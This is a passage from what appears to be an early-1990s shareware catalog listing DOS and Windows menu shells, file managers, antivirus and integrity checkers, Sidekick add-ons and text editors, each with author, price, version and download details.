or print out + information about your disks and directories. + + Product: XDIR + Attach descriptive comments to DIR displays. See full + description on page 22. + + 2.7.3 Combined MS/FMs + + Product: Command Post + Needs: IBM PC, Windows 3.0 or better. Mouse recommended. + Author: Wilson WindowWare, Inc., 206-937-9335 + Registration: $49.95 + Registration benefits: Printed manual, tech support, 90 day money + back gaurantee. + Version: 7.0S (02-15-91) + User benefits: Printed manual, tech support, 90 day money back + gaurantee. + Look for: CP-70S.ZIP on BBSs (call 206-935-5198 to download it at + no charge); CP-70S.ZIP in WINAPA forum LIB 15 on CompuServe. + Download size: 200k + Description: + A powerful custom menu system for Microsoft Windows that lets + you tailor your Windows-based workstation to your needs and + preferences. A single menu item can gather filenames and other + information into listboxes for the user to choose from, perform + arithmetic, parse strings, move and resize windows, read and + write WIN.INI variables, read DOS environment variables, copy, + move and delete files. Includes useful sample menus, a file + browser, and much more. + + Product: fastmenu GOLD + Needs: IBM PC, DOS 2.1 or better. VGA monitor; hard drive. + Author: jwh: SoftWare, 419-588-3608 + Registration: $60.00 + Registration benefits: Printed manual, 51/4' & 31/2' disks, and one + year free phone support. + Version: 4.1 (09-01-91) + User benefits: Printed manual, 51/4' & 31/2' disks, and one year free + phone support. + Look for: GOLD41*.ZIP (multiple files) on BBSs (call 419-588-3615 + to download it at no charge); GOLD4*.ZIP in IBMSYS forum LIB 0 + (multiple files) on CompuServe. + Download size: 500k + Description: + Very attractive graphics based hard drive menuing system. Fully + mouse supported with lots of built-in utilities and options. + Totally removes itself from memory during application + execution. Full password protection with up to 40 user titled + pages with up to 20 applications per page. Includes: Phonebook + database with Dialer, Complete directory and file maintenance + module, AUTOEXEC.BAT & CONFIG.SYS file switcher, Batch/Text + file editor with cut & paste, Set Time & Date, Much Much More. + + Chapter 2, "Utilities" 113 + + + + Product: Hard Disk Director + Needs: IBM PC, DOS 2.0 or better. + Author: Canyon Software, 415-453-9779 + Registration: $40.00 + Registration benefits: Printed manual, master disks, phone/ + CompuServe/mail support. + Version: 5.0 (02-09-92) + User benefits: Printed manual, master disks, phone/CompuServe/ + mail support. + Look for: availability unknown on BBSs; DIRP.ZIP in IBMSYS forum + LIB 5 (multiple files) on CompuServe. + Download size: 330k + Description: + A series of programs making up a complete hard disk menu, shell + and file manager. DL.EXE is a full featured shell. You can + mark selected directories or files for copying, moving or + removing or viewing. DB.EXE gives you a sorted file list for + any directory. DA.EXE shows you all the files on a particular + drive or drives. DM is a full featured hard disk menu. You can + add up to 20 entries to the main menu and have unlimited + submenus of up to 20 entries each. Viewer and shell for ZIP + files. + + Product: MenuDIRECT Gold + Needs: IBM PC, DOS 3.0 or better. Hard disk, 512k RAM. + Author: Applied Micro Systems Technology, 405-377-0444 + Registration: $39.95 + Registration benefits: Disk with latest version, manual, free + support and update notices. + Version: 3.0 (06-01-91) + User benefits: Disk with latest version, manual, free support and + update notices. + Look for: MDR30.ZIP on BBSs; MDR30.ZIP in IBMSYS forum LIB 5 on + CompuServe. + Download size: 525k + Description: + Was the Point & Shoot Hard Disk Manager - all new rewrite. + Nominated for one of BYTE Magazine's best product awards at + Spring COMDEX 1991. Outstanding file/directory/program + manager. Unlimited user menus with with single-keystroke + program execution. Split-screen file list and directory tree + with all standard commands and some valuable extras. Pull-down + menus, context-sensitive help, mouse support, floppy disk + formatting, password protection, usage logging and a host of + other features. + + Chapter 2, "Utilities" 114 + + + + Product: Wyndshell [***] + Needs: IBM PC, DOS 3.0 or better. 256k RAM. + Author: Wyndware, 608-755-1628 + Registration: $45.00 + Registration benefits: Printed manual, tutorial, master disks, + upgrade discounts. + Version: 2.2 (08-01-91) + User benefits: Printed manual, tutorial, master disks, upgrade + discounts. + Look for: WSHELL22.ZIP on BBSs. + Download size: 150k + Description: + This menu program is useful for organizing your hard disk. It + is used to create menu options to run all the programs + contained on your computer. Any number of menus and submenus + may be set up. Since Wyndshell is not memory-resident, it + surrenders all of your computer's memory to each application. + Wyndshell may also be used on a network, and passwords may be + assigned to any menu options. Included is the Wynd-DOS file + manager. + + 2.7.4 MS/FMs for developers + + Product: Command Post + Programmable Shell/File Mgr. for Windows 3.0. See full + description on page 112. + + Product: WinBatch + Windows Batch Language. See full description on page 73. + + 2.7.5 Work environment managers + + Product: CM_FILER + Multi-Function Disk/File Manager. See full description on + page 109. + + Chapter 2, "Utilities" 115 + + + + Product: InContext + Needs: IBM PC, DOS 3.0 or better. 512k RAM, hard disk. + Author: Rams' Island Software, 303-841-2848 + Registration: $60.00 + Registration benefits: Current and next versions; Nice typeset + manual; At least one year of voice/BBS/newsletter support; + Opportunity to test new releases. + Version: 1.02 (10-21-91) + User benefits: Current and next versions; Nice typeset manual; At + least one year of voice/BBS/newsletter support; Opportunity to + test new releases. + Look for: INCX102*.ZIP (multiple files) on BBSs (call + 303-841-6269 to download it at no charge); INCXT*.ZIP in IBMSYS + forum LIB 5 (multiple files) on CompuServe. + Download size: 440k + Description: + Improves your productivity by helping you organize, manage, and + execute whatever you do on your computer. No mere DOS shell, + this program is based on the principles of human work. On top + of a unique, object-oriented DOS shell, InContext provides + well-integrated task planning and calendar management. Its + basic features are readily useable by novices, but it provides + a level of control and sophistication that will please the + expert. Great help/tutor/docs! + + + 2.8 Security programs + + "Shareware is as safe as [retail] software if obtained + directly from an author or from a vendor or BBS who + has gotten the disk directly from the author." + -- an official ASP statement on shareware + + + See also: Utilities, File utilities, Backup/restore (page 28); + Utilities, File utilities, Encryption & security (page 32); + Utilities, File utilities, File archivers (page 34); Utilities, + File utilities, File comparison (page 37); Utilities, System + Utilities, Recovery utilities (page 77). + + Product: HDM IV - Hard Disk Menu + DOS Menu & Security System, Network Support. See full + description on page 102. + + Product: LOGIK MENU + Menu System, 43/50 lines, Mouse, Events, Log. See full + description on page 103. + + Chapter 2, "Utilities" 116 + + + + Product: An Ounce Of Prevention + Needs: IBM PC, DOS 2.0 or better. Hard drive. 18k RAM for TSR + module. + Author: Pete Maclean Software + Registration: $35.00 + Registration benefits: Printed manual. Latest version. Update + notification. Goodies! + Version: 1.05 (07-01-91) + User benefits: Printed manual. Latest version. Update + notification. Goodies! + Look for: OZ.ZIP on BBSs; OZ.EXE in IBMSYS forum LIB 3 on + CompuServe. + Download size: 94k + Description: + Prevents disasters with your hard disks and the files on them. + Keeps "deleted" files invisibly, in limbo, available for + instant guaranteed retrieval. Saves up to 8 deleted + generations of each file, truly purging the oldest only when + disk space is exhausted. Also forcibly prevents reformats of + hard disks, elegantly describes critical disk errors, + gracefully handles disk-full conditions, and more. + + Junk your UNDELETEs and UNFORMATs! An Ounce Of Prevention is + worth a pound of messy recovery. + + Product: Shredder/2 + Needs: IBM AT (80286), OS/2 1.0 or better. + Author: Richard W. Adams + Registration: $5.00 + Registration benefits: Eligibility for free upgrades. + Version: 1.10 (01-23-91) + User benefits: Eligibility for free upgrades. + Look for: SHREO110.ZIP on BBSs; SHRE02.ZIP in IBMSYS forum LIB 2 + on CompuServe. + Download size: 25k + Description: + This Presentation Manager program securely erases files so no + one can retrieve their data. Options to keep a log of shredded + files, to shred hidden & read only files, & make a backup copy + of the files before shredding. + + Chapter 2, "Utilities" 117 + + + + 2.8.1 Virus/Trojan detectors + + Product: Flu_Shot+ + Needs: IBM PC, DOS 2.1 or better. 16k RAM. + Author: Software Concepts Design, 212-889-6431 + Registration: $15.00 + Registration benefits: Regular updates and update discounts, + timely support, a clean copy directly from the author. + Version: 1.82 (05-11-91) + User benefits: Regular updates and update discounts, timely + support, a clean copy directly from the author. + Look for: FSP*.ZIP on BBSs (call 212-889-6438 to download it at + no charge); FSP*.ZIP in IBMSYS forum LIB 0 on CompuServe. + Download size: 50k + Description: + An active monitoring program for detecting and preventing + computer viruses and insures the integrity of the programs you + use on your system. + + By selecting the various levels of protection you wish to + install on your system, you can be sure that the program you + are about to run is only the program you wanted to run and does + not contain any computer viruses. + + Winner of PC Magazine's Editor Choice award. Updated on a + regular basis. + + Product: Integrity Master(tm) + Needs: IBM PC, DOS 2.0 or better. + Author: Stiller Research, 904-575-7884 + Registration: $35.00 + Registration benefits: Printed manual, master disks, virus + support. + Version: 1.11a (02-17-91) + User benefits: Printed manual, master disks, virus support. + Look for: I-M*.ZIP on BBSs (call 215-623-6845 CONF77 to download + it at no charge); I-MAST.EXE in IBMSYS forum LIB 3 (multiple + files) on CompuServe. + Download size: 250k + Description: + A powerful comprehensize anti-virus and data integrity product. + Do you have a virus? A flaky hard disk? Did someone change a + file while you were out? Find out for sure with Integrity + Master. Use this to easily defeat viruses and get the extra + benefits of PC security, change control and disk problem + detection. It enables detection of ANY virus (not just known + ones), but doesn't need periodic updates, although it + recognizes known viruses by name. + + Chapter 2, "Utilities" 118 + + + + Product: PC Canary + Needs: IBM PC, DOS 2.1 or better. + Author: Compass / New England, 603-431 8030 + Registration: $19.95 + Registration benefits: Manual, most recent version, phone/mail/ + CIS support; all registered users will be notified of any known + problems. + Version: 91g (05-15-91) + User benefits: Manual, most recent version, phone/mail/CIS + support; all registered users will be notified of any known + problems. + Look for: CY91G.* on BBSs (call 603-433 1859 to download it at no + charge); CY91G.EXE in IBMSYS forum LIB 3 on CompuServe; + CY91G.LZH in IBMPC RTC LIB 5 on GEnie. + Download size: 90k + Description: + * Detects modifications to .EXE, .DAT and COMMAND.COM files + * Installs easily + * Low maintenance; does not require frequent updates + * Low overhead (fast, not memory resident) + * Low false alarm rate + * Doesn't modify files; can be used with other security + programs + * Allows DOS upgrades + + Named for miner's canary whose death signalled invisible toxic + fumes. + + Product: STAFF-INTEGRATOR + Menu generator for STAFF and other S/W. See full description + on page 106. + + 2.8.2 Virus cleanup/removal + + Product: Integrity Master(tm) + Easy to use anti-virus/data integrity prog. See full + description on page 117. + + 2.8.3 System activity monitors + + Product: Flu_Shot+ + Virus Detection/Prevention via active monitor. See full + description on page 117. + + Product: STAFF-INTEGRATOR + Menu generator for STAFF and other S/W. See full description + on page 106. + + 2.8.4 File integrity monitors + + Product: Flu_Shot+ + Virus Detection/Prevention via active monitor. See full + description on page 117. + + Chapter 2, "Utilities" 119 + + + + Product: Integrity Master(tm) + Easy to use anti-virus/data integrity prog. See full + description on page 117. + + Product: PC Canary + Virus alarm. See full description on page 117. + + Product: STAFF-INTEGRATOR + Menu generator for STAFF and other S/W. See full description + on page 106. + + + 2.9 Software tools + + 2.9.1 For multiple programs + + Product: HDM IV - Hard Disk Menu + DOS Menu & Security System, Network Support. See full + description on page 102. + + 2.9.2 For Sidekick + + Product: CALendar preview for SideKick 2 + Needs: IBM PC, DOS 2.1 or better. Sidekick 2.0; 320k RAM; hard + disk. + Author: WetZoft Applications, 301-969-9385 + Registration: $25.00 + Registration benefits: Printed Manual & Latest Disk; + Phone,CompuServ,GEnie Support; Priority Enhancement + Consideration. + Version: 1.03 (05-13-91) + User benefits: Printed Manual & Latest Disk; + Phone,CompuServ,GEnie Support; Priority Enhancement + Consideration. + Look for: CALSK103.EXE on BBSs (call 414-789-4210 to download it + at no charge); CALSK.EXE in BORAPP forum LIB 1 on CompuServe; + CALSK103.EXE in BORLAND RTC LIB 15 on GEnie. + Download size: 92k + Description: + Produces a preview of your Calendar and ToDo's to the Screen, + Printer, or File from SK2's Calendar file (.DB) without + invoking SK2. Invoke from command line or batch file to preview + next 'n' days of activities. Features: Notes; Reminders; Look + Ahead, Searching, RTM Interface; Intl Sort; Fixed 4+ Hour + Appointments. + + Chapter 2, "Utilities" 120 + + + + Product: SWAPSK + Needs: IBM PC, DOS 3.1 or better. Borland's SideKick 1.0 or 2.0, + or SideKick Plus. + Author: Innovative Data Concepts, Inc., 215-443-9705 + Registration: $25.00 + Registration benefits: Disk and printed manual. + Version: 1.7x (04-15-90) + User benefits: Disk and printed manual. + Look for: availability unknown on BBSs; SWSK17.COM in PCVENC + forum LIB 6 (multiple files) on CompuServe. + Download size: 35k + Description: + Makes it possible to load many popular TSRs in less than 8K of + your DOS memory. With a "High-DOS" memory manager, these + resident programs now require 0K of DOS memory. + + 2.9.2.1 Sidekick Plus specific + + Product: CALendar RePorT for SideKick+ + Needs: IBM PC, DOS 2.1 or better. 256k RAM. SideKick Plus. + Hard disk recommended. + Author: WetZoft Applications, 301-969-9385 + Registration: $25.00 + Registration benefits: Printed Manual & Latest Disk; + Phone,CompuServ,GEnie Support; Priority Enhancement + Consideration. + Version: 2.51 (04-08-91) + User benefits: Printed Manual & Latest Disk; + Phone,CompuServ,GEnie Support; Priority Enhancement + Consideration. + Look for: CALRP251.EXE on BBSs (call 414-789-4210 to download it + at no charge); CALRP.EXE in BORAPP forum LIB 2 on CompuServe; + CALRP251.EXE in BORLAND RTC LIB 15 on GEnie. + Download size: 80k + Description: + Produces nicely formatted calendar reports to Screen, Printer, + File from SK+'s Calendar file (.APP) without invoking SK+. + Invoke from command line or batch file to preview next 'n' days + of activities. Features: Notes; Reminders; Searching; Look + Ahead, Task Notes, RTM Interface; Many Options + + Chapter 2, "Utilities" 121 + + + + Product: CALendar report for TRaVel + Needs: IBM PC, DOS 2.1 or better. 256k RAM. Sidekick Plus. + Hard disk recommended. + Author: WetZoft Applications, 301-969-9385 + Registration: $25.00 + Registration benefits: Printed Manual & Latest Disk; + Phone,CompuServ,GEnie Support; Priority Enhancement + Consideration. + Version: 1.05 (04-08-91) + User benefits: Printed Manual & Latest Disk; + Phone,CompuServ,GEnie Support; Priority Enhancement + Consideration. + Look for: CALTR105.EXE on BBSs (call 414-789-4210 to download it + at no charge); CALTR.EXE in BORAPP forum LIB 2 on CompuServe; + CALTR105.EXE in BORLAND RTC LIB 15 on GEnie. + Download size: 81k + Description: + Produces formatted Daily, Weekly, Monthly calendar reports to + Screen, Printer, File from SK+'s Calendar file (.APP) without + invoking SK+. Like Traveling Sidekick! Invoke from command line + or batch file to preview next 'n' days, weeks, months of + activities. Features include: Notes; Install Program; Many + Options; NEW: Print Next Day, Week, Month; + + 2.9.3 For PC Tools + + 2.9.3.1 Deluxe Shell specific + + Product: SWAPDS + Needs: IBM PC, DOS 3.1 or better. PC Tools Deluxe Shell 6.0 or + Deluxe Desktop 6.0. + Author: Innovative Data Concepts, Inc., 215-443-9705 + Registration: $25.00 + Registration benefits: Disk and printed manual. + Version: 1.7x (04-15-90) + User benefits: Disk and printed manual. + Look for: availability unknown on BBSs; SWDS17.COM in PCVENC + forum LIB 6 (multiple files) on CompuServe. + Download size: 35k + Description: + Makes it possible to load many popular TSRs in less than 8K of + your DOS memory. With a "High-DOS" memory manager, these + resident programs now require 0K of DOS memory. + + 2.9.4 For 4DOS + + Product: 4EDIT + Full-screen editor for file descriptions. See full description + on page 108. + + Product: 4FILES + File manager & annotator for 4DOS & NDOS. See full description + on page 108. + + Chapter 2, "Utilities" 122 + + + + Product: 4ZIP/4UNZIP + Needs: IBM PC, DOS 2.0 or better. 4DOS; PKZIP/PKUNZIP. + Author: XD Systems, 703-821-3215 + Registration: $15.00 + Registration benefits: Disk and printed manual; telephone and CIS + support; public domain bonus programs. + Version: 2.00 (10-24-91) + User benefits: Disk and printed manual; telephone and CIS + support; public domain bonus programs. + Look for: availability unknown on BBSs; 4ZIP.ZIP in IBMSYS forum + LIB 1 on CompuServe. + Download size: 155k + Description: + A utility for 4DOS. Used with the PKWare compression program + PKZIP, it compresses 4DOS file descriptions along with the + files. The included program 4UNZIP calls PKUnzip and restores + the descriptions as each file is uncompressed. Select files to + Zip or Unzip from a full-screen list with extended wildcards. + Pass through commands to PKZIP and PKUNZIP, obtained + separately. + + Supports 4DOS 4.0 80 character descriptions and extended + fields. + + 2.9.5 For Lotus + + Product: SWAPLM + Needs: IBM PC, DOS 3.1 or better. Lotus Metro or Lotus Express. + Author: Innovative Data Concepts, Inc., 215-443-9705 + Registration: $25.00 + Registration benefits: Disk and printed manual. + Version: 1.7x (04-15-90) + User benefits: Disk and printed manual. + Look for: availability unknown on BBSs; SWLM17.COM in PCVENC + forum LIB 6 (multiple files) on CompuServe. + Download size: 35k + Description: + Makes it possible to load many popular TSRs in less than 8K of + your DOS memory. With a "High-DOS" memory manager, these + resident programs now require 0K of DOS memory. + + Chapter 2, "Utilities" 124 + + + + 2.9.6 For Norton + + 2.9.6.1 For Norton Guides + + Product: SWAPNG + Needs: IBM PC, DOS 3.1 or better. Norton Guides. + Author: Innovative Data Concepts, Inc., 215-443-9705 + Registration: $25.00 + Registration benefits: Disk and printed manual. + Version: 1.7x (04-15-90) + User benefits: Disk and printed manual. + Look for: availability unknown on BBSs; SWNG17.COM in PCVENC + forum LIB 6 (multiple files) on CompuServe. + Download size: 35k + Description: + Makes it possible to load many popular TSRs in less than 8K of + your DOS memory. With a "High-DOS" memory manager, these + resident programs now require 0K of DOS memory. + + 2.9.6.2 For Norton Utilities + + Product: 4FILES + File manager & annotator for 4DOS & NDOS. See full description + on page 108. + + 2.9.7 For PKWARE + + 2.9.7.1 For PKZIP/PKUNZIP + + Product: 4ZIP/4UNZIP + Includes 4DOS file descriptions in ZIP files. See full + description on page 121. + + Product: EZ-Reader + Offline mail reader for PCBoard & Wildcat! See full + description on page 177. + + Product: PMZIP [***] + OS/2 Presentation Manager ZIP shell. See full description on + page 35. + + Product: QFiler + Simple, powerful with 2 side-by-side windows. See full + description on page 110. + + Product: Shez + Program shell for managing compressed files. See full + description on page 36. + + Product: WinZip [***] + Windows ZIP/LZH/ARC Shell:View/Run/Extract/+. See full + description on page 36. + + Chapter 2, "Utilities" 125 + + + + Product: ZiPaper + Randomly select Wallpaper - store compressed! See full + description on page 346. + + 2.9.8 For other + + Product: dLITE + Memory-res dBASE-Compat Desktop File Manager. See full + description on page 155. + + Product: SWAPDOS + Switches from one large program to another. See full + description on page 41. + + Product: SWAPMM + Needs: IBM PC, DOS 3.1 or better. Broderbund's MemoryMate. + Author: Innovative Data Concepts, Inc., 215-443-9705 + Registration: $25.00 + Registration benefits: Disk and printed manual. + Version: 1.7x (04-15-90) + User benefits: Disk and printed manual. + Look for: availability unknown on BBSs; SWMM17.COM in PCVENC + forum LIB 6 (multiple files) on CompuServe. + Download size: 35k + Description: + Makes it possible to load many popular TSRs in less than 8K of + your DOS memory. With a "High-DOS" memory manager, these + resident programs now require 0K of DOS memory. + + Product: SWAPTN + Needs: IBM PC, DOS 3.1 or better. Micrologic's Tornado. + Author: Innovative Data Concepts, Inc., 215-443-9705 + Registration: $25.00 + Registration benefits: Disk and printed manual. + Version: 1.7x (04-15-90) + User benefits: Disk and printed manual. + Look for: availability unknown on BBSs; SWTN17.COM in PCVENC + forum LIB 6 (multiple files) on CompuServe. + Download size: 35k + Description: + Makes it possible to load many popular TSRs in less than 8K of + your DOS memory. With a "High-DOS" memory manager, these + resident programs now require 0K of DOS memory. + + Chapter 2, "Utilities" 126 + + + + 2.10 Other + + Product: LiteSPM + Needs: IBM PC, DOS 2.1 or better. 25k RAM. + Author: Information Technology, Ltd., 401-724-2730 + Registration: $15.00 + Registration benefits: Latest version, free telephone support, + notification of inexpensive updates. + Version: 1.01 (07-01-91) + User benefits: Latest version, free telephone support, + notification of inexpensive updates. + Look for: SPM.ZIP on BBSs; SPM.ZIP in PCM:UTILFORUM forum LIB 14 + on CompuServe; SPM.ZIP in IBMPC RTC LIB 5 on GEnie. + Download size: 49k + Description: + A background (TSR) serial port montior capable of logging + serial port data to disk in an unattended mode. Takes less + than 25K when resident. User configurable. Frees your system + for other work while still capturing that valuable data. + + Chapter 3, "Writing applications" 127 + + + + + + Chapter 3 + Writing applications + + See also: Utilities, File utilities, File viewers (page 40). + + + 3.1 Text editors + + See also: Writing applications, Word processors (page 133). + + Product: AM-EDIT + Needs: IBM PC, DOS 2.0 or better. Hard disk. + Author: PLC Software, 205-822-1619 + Registration: $37.00 + Registration benefits: Latest version with up-to-date on-disk + manual; 6 month voice/CIS support; notification of new + releases; right to purchase any new release at $30 discount. + Version: 1.00 (01-10-92) + User benefits: Latest version with up-to-date on-disk manual; 6 + month voice/CIS support; notification of new releases; right to + purchase any new release at $30 discount. + Look for: availability unknown on BBSs. + Download size: 42k + Description: + A full-screen text editor which is both powerful and extremely + easy to use. Includes extensive on-screen help. Very fast in + loading/saving files and finding text strings. Allows merging + of text files. Includes a calculator and a User ID function, + allowing up to 30 different users to have their own parameters + such as screen colors, backup option, and lines-to-scroll. Can + store up to 3.5 times as much text in real memory as some PC + editors. Entire system contained in a single 42K program. + + Product: BOXER(tm) Text Editing System + Needs: IBM PC, DOS 2.0 or better. Hard disk or 720K floppy + drive. + Author: BOXER Software, 603-924-6602 + Registration: $35.00 + Registration benefits: Latest version, quick reference card, + LEFTHAND MAN file browser program, phone support. + Version: 3.20 (01-25-92) + User benefits: Latest version, quick reference card, LEFTHAND MAN + file browser program, phone support. + Look for: BOX*.ZIP on BBSs (call 215-623-6203,JOIN77 to download + it at no charge); BOX*.ZIP in IBMAPP forum LIB 1 on CompuServe; + BOX*.ZIP in IBMPC RTC LIB 3 on GEnie. + Download size: 246k + Description: + A powerful, full-featured Text Editor. Features 512-level Undo, + full mouse support, 28/43/50 lines for E/VGA, multiple files/ + windows, column marking, editable keystroke macros, search + across all edited files, graphic drawing, colors, compile from + + Chapter 3, "Writing applications" 128 + + + + editor, word processing and context sensitive help. Extensive + block text commands: sort, fill, case, total, invert... + Reconfigurable keyboard with popular maps supplied; pull-down + menus & online help change *dynamically* to reflect + reassignment! + + Product: EDWORD + Needs: IBM PC, DOS 2.0 or better. + Author: FAGERLUND CONSULTING, 604-984-7330 + Registration: $44.00 + Registration benefits: Printed user's guide. Six months free + voice telephone support. + Version: 1.0 (11-26-91) + User benefits: Printed user's guide. Six months free voice + telephone support. + Look for: EDWORD.ZIP on BBSs; EDWORD.ZIP in IBMAPP forum LIB 1 on + CompuServe; EDWORD.ZIP in IBMPC RTC LIB 3 on GEnie. + Download size: 75k + Description: + This full featured, multi-file text editor is small, quick and + easy to use. It uses a numbered file list to assist when + editing many files from various directories. Allows search and + replace through all files in the list. Can search + subdirectories to locate files for editing. Prints to any + printer in 2 modes with optional line numbers. Has line + drawing, cut and paste, macros, ASCII table, no file size + limit, color or b/w, 3 help screens. + + Product: Flex + Fast multiwindow word processor. See full description on + page 134. + + Product: KWIKWRITE + Word Processor. See full description on page 134. + + Product: NED + Needs: IBM PC, DOS 2.11 or better. 256K RAM, CGA monitor. + Author: David L. Dight, +61-2 331-4521 + Registration: $50.00 + Registration benefits: Printed manual, master disks, mail/email + support, one free major uprade. + Version: 1.6b (02-18-92) + User benefits: Printed manual, master disks, mail/email support, + one free major uprade. + Look for: NEDIT.EXE on BBSs (call +1 505 662-0659 to download it + at no charge); NEDIT.EXE in IBMAPP forum LIB 1 on CompuServe. + Download size: 208k + Description: + A high performance text editor. Features: Edit up to 10 files; + Expand wildcards, pick lists; On line calculator, ASCII tables + and help; Super fast screens; EGA43/VGA50 line modes; std. edit + functions+more; autosave; {} match, field copy, copy strings to + search/last command; Embed print commands; Print while you + work; Powerful reg. expr. search & replace; Use DOS; Config. + + Chapter 3, "Writing applications" 129 + + + + env.; Block/column copy, cut, paste and format across files(s); + Kbd macros; Browse drives/dirs for files. + + Product: Oak Hill Vi(tm) + Needs: IBM PC, DOS 2.1 or better. + Author: Oak Hill Software, Inc., 908-671-8544 + Registration: $60.00 + Registration benefits: Latest version on disk, typeset-quality + manual, support by mail. + Version: 5.7A (05-18-91) + User benefits: Latest version on disk, typeset-quality manual, + support by mail. + Look for: availability unknown on BBSs; VI57A1.ZIP in IBMAPP + forum LIB 1 on CompuServe. + Download size: 160k + Description: + A professional-grade version of "vi", the standard UNIX full- + screen text editor. Includes virtually all vi features: undo, + map/abbreviation macros, text search/substitution with meta + characters, shell escapes, external filters, margin wrap, save + buffers, line numbers and auto-indent, plus built-in paragraph + formatting, color control, line centering, case conversion and + more. Archive includes comprehensive manual and utilities. + + Product: OMNIDay + Daily Diary Program For Up To 10 Users. See full description + on page 98. + + Product: pE - The "perfect" Editor(tm) + Needs: IBM PC, DOS 2.1 or better. + Author: Just Excellent Software, Inc., 215-565-7780 + Registration: $39.00 + Registration benefits: Printed manual, Multi-math calculator, + separate print utility, keyboard reconfigurator, technical + support and free upgrade to next major release. + Version: 2.77 (08-25-91) + User benefits: Printed manual, Multi-math calculator, separate + print utility, keyboard reconfigurator, technical support and + free upgrade to next major release. + Look for: PETPE277.ZIP on BBSs; PETPE.EXE in IBMAPP forum LIB 1 + on CompuServe. + Download size: 227k + Description: + Up to 20 movable, sizable, overlayed or tiled windows. Mouse + interface allows easy cut, paste, move, mark, etc. Works well + with keyboard also. Full featured with regular expressions, + brace matching, key macros, include file editing and over 100 + other functions. Word process mode allows auto reformat, and + justification. Box and line drawing for easy, quick forms can + be done with mouse or cursor keys. Files the size of memory, + very fast. Pull down menus and extensive on-line help make it + easy. + + Chapter 3, "Writing applications" 130 + + + + Product: pEDIT PLUS + Needs: IBM PC, DOS 2.1 or better. 384k RAM. CGA monitor and + hard disk recommended. + Author: T. G. Muench, 602-445-2479 + Registration: $30.00 + Registration benefits: Master disks, unlimited support, bonus + utilities, product discounts. Shareware disks of other + programs. + Version: 1.0 (12-15-91) + User benefits: Master disks, unlimited support, bonus utilities, + product discounts. Shareware disks of other programs. + Look for: PEDIT*.ZIP on BBSs; PEDIT.ZIP in IBMAPP forum LIB 1 on + CompuServe. + Download size: 192k + Description: + This DOS-based text editor has a graphical interface and full + mouse support. The graphical ButtonBar gives quick access to 18 + functions without having to deal with menus. Text-only mode. + Wordstar, EMACS and MS Quick Editor emulation. Auto word wrap, + paragraph indent, case change, block indent, timed autosave, + Ascii chart, DOS buffer. Now handles up to 16 files at one + time. Also new is a tutorial that walks you through the basics + of editing. Rated a Trophy by Public Brand. + + Product: PostCardMaster + PostCard & Mail Handling System. See full description on + page 161. + + Product: QEdit(R) Advanced + Needs: IBM PC, DOS 2.0 or better. + Author: SemWare, 404-641-9002 + Registration: $54.95 + Registration benefits: 140-page professionally printed, indexed, + spiral bound manual. Quick reference card. Friendly, + knowledgeable tech support via phone, multi-line bbs, FAX and/ + or mail. Access to maintenance releases on bbs. Low cost major + updates. + Version: 2.1 (04-03-90) + User benefits: 140-page professionally printed, indexed, spiral + bound manual. Quick reference card. Friendly, knowledgeable + tech support via phone, multi-line bbs, FAX and/or mail. Access + to maintenance releases on bbs. Low cost major updates. + Look for: QEDIT21.ZIP on BBSs (call 404-641-8968 to download it + at no charge); QEDIT.ZIP in IBMAPP forum LIB 1 on CompuServe. + Download size: 128k + Description: + Blazingly Fast, multi-file, multi-window, compact (44k) text + editor, that is powerful, yet EASY to use. Includes pulldown + menus, macros, column blocks, and basic word-processing + features. Completely configurable, including keyboard, colors + and initial settings. New in version 2.1 are: swap to disk/EMS + on shell, CenterLine, plus much more! 1989 Data Based Advisor + readers choice as best Program/Text Editor. Over 75,000 + + Chapter 3, "Writing applications" 131 + + + + licensed users. Rated as "Highly recommended" by John Dvorak in + 1989 PC Magazine. + + Product: Ravitz Editor [***] + Needs: IBM PC, DOS 2.0 or better. + Author: Ravitz Software Inc., 606-268-4223 + Registration: $35.00 + Registration benefits: Master disks, BBS/mail support. + Version: 1.10 (08-31-91) + User benefits: Master disks, BBS/mail support. + Look for: RAVED.ZIP on BBSs (call 606-268-0577 to download it at + no charge); RAVED.ZIP in IBMAPP forum LIB 1 on CompuServe. + Download size: 150k + Description: + A fast, powerful, mid sized text editor. It has integrated + outlining and overviewing, area mark manipulation (copy, fill, + shift, sort, etc.), find/change, word wrap and reflow, line + drawing, multiple file handling, change tracking, flexible user + interface (function keys, mouse, menus), and it is configurable + and programmable. + + Product: Technical Editor + Needs: IBM PC, DOS 2.0 or better. + Author: Superior Soft + Registration: $39.95 + Registration benefits: Printed manual, BBS and mail support, + Source code available. + Version: 2.61 (09-02-91) + User benefits: Printed manual, BBS and mail support, Source code + available. + Look for: availability unknown on BBSs; TE261*.ZIP in IBMAPP + forum LIB 1 (multiple files) on CompuServe. + Download size: 125k + Description: + A fast, full featured and unique programmer's/text editor. + Features include: + * Virtual memory (edits huge files) + * XMS support + * Undo last 100 changes + * 25,43,50 line display support + * Re-definable commands + * Binary mode for editing binary files + * Keystroke macros + * Line and column blocking modes + * Regular expression search and replace + * Keystroke macros + * Bookmarks + * File pick lists + * Multi-Screen AND multi-Window + + Chapter 3, "Writing applications" 132 + + + + Product: WinEdit + Needs: IBM PC, Windows 3.0 or better. Mouse recommended. + Author: Wilson WindowWare, Inc., 206-937-9335 + Registration: $59.95 + Registration benefits: Printed manual, tech support, 90-day money + back gaurantee. + Version: 1.1C (07-01-91) + User benefits: Printed manual, tech support, 90-day money back + gaurantee. + Look for: WED11C.ZIP on BBSs (call 206-935-5198 to download it at + no charge); WED11C.ZIP in WINAPA forum LIB 15 on CompuServe. + Download size: 90k + Description: + A new text editor designed to take full advantage of the + Windows 3.0 environment. First and foremost a programmers + editor, it has features designed for creating and maintaining + program source code. With its ASCII file format, ability to + edit files of almost unlimited size, and easy-to-use ribbon + bar, it makes the perfect editor for everyday use. + + Product: WordMaster + ASCII Word Processor. See full description on page 134. + + + 3.2 Text organizers + + Product: dtSearch + Document search and retrieval program. See full description on + page 163. + + Product: Index! + Automatic Index Coding for Ventura Publisher. See full + description on page 137. + + Product: MakeDemo + Presentation program with interactive menuing. See full + description on page 184. + + Product: PAGE COUNT + Needs: IBM PC, DOS 3.3 or better. + Author: Tinker Software + Registration: $15.00 + Registration benefits: Unlimited fax/BBS support. + Version: 2.0A (11-23-91) + User benefits: Unlimited fax/BBS support. + Look for: PGCNT20A.ZIP on BBSs (call 206-852-7708 to download it + at no charge); PGCNT2.ZIP in IBMAPP forum LIB 1 on CompuServe. + Download size: 73k + Description: + Takes any normal text file and compute how many pages of + standard paper it will take to print out the file. All + computation is based on printing 55 lines per page. With this + version you will have the option to print out the file from + + Chapter 3, "Writing applications" 133 + + 